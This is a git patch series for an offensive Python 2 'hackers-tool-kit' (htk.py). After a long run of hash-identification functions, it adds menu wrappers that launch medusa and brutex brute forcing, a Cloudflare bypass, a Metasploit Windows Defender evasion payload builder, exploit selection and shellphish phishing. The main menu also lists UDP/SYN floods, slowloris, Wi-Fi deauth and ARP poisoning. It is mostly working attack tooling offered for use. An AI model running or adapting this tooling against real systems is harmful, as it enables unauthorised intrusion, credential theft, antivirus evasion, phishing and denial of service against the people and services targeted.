hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + found = True +mainbanner() +main() From 418e04436c6bfb44385e6da8213b1e32e47699cd Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 20:11:57 +0100 Subject: [PATCH 060/214] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 221fff8..be2d9d4 100644 --- a/README.md +++ b/README.md @@ -38,3 +38,5 @@ this is where i will try to put the most recent updates * help banner update * added a connect option + +* added an about me option From c3909ac5811009f21f3cc6243bde255e64403717 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 20:51:57 +0100 Subject: [PATCH 061/214] Delete htk.py --- htk.py | 2067 -------------------------------------------------------- 1 file changed, 2067 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 24aa662..0000000 --- a/htk.py +++ /dev/null @@ -1,2067 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - 